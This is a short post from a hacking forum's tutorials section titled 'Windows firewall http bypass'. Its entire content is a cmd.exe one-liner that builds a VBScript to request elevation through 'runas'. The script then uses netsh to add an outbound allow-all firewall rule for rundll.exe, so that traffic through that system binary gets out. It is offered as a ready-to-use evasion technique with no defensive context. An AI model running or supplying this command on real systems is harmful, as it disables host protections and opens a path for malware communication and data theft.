![]() |
|
Windows firewall http bypass - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials) +--- Thread: Windows firewall http bypass (/Thread-Windows-firewall-http-bypass) |
Windows firewall http bypass - hacxx - 02-16-2023 Command execution from cmd.exe Code: cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c netsh.exe advfirewall firewall add rule name=rundll32 dir=out action=allow protocol=any program=c:\windows\system32\rundll.exe", , "runas", 1 >>1b.vbs && 1b.vbsFrom: Hacxx Magician Update 4 |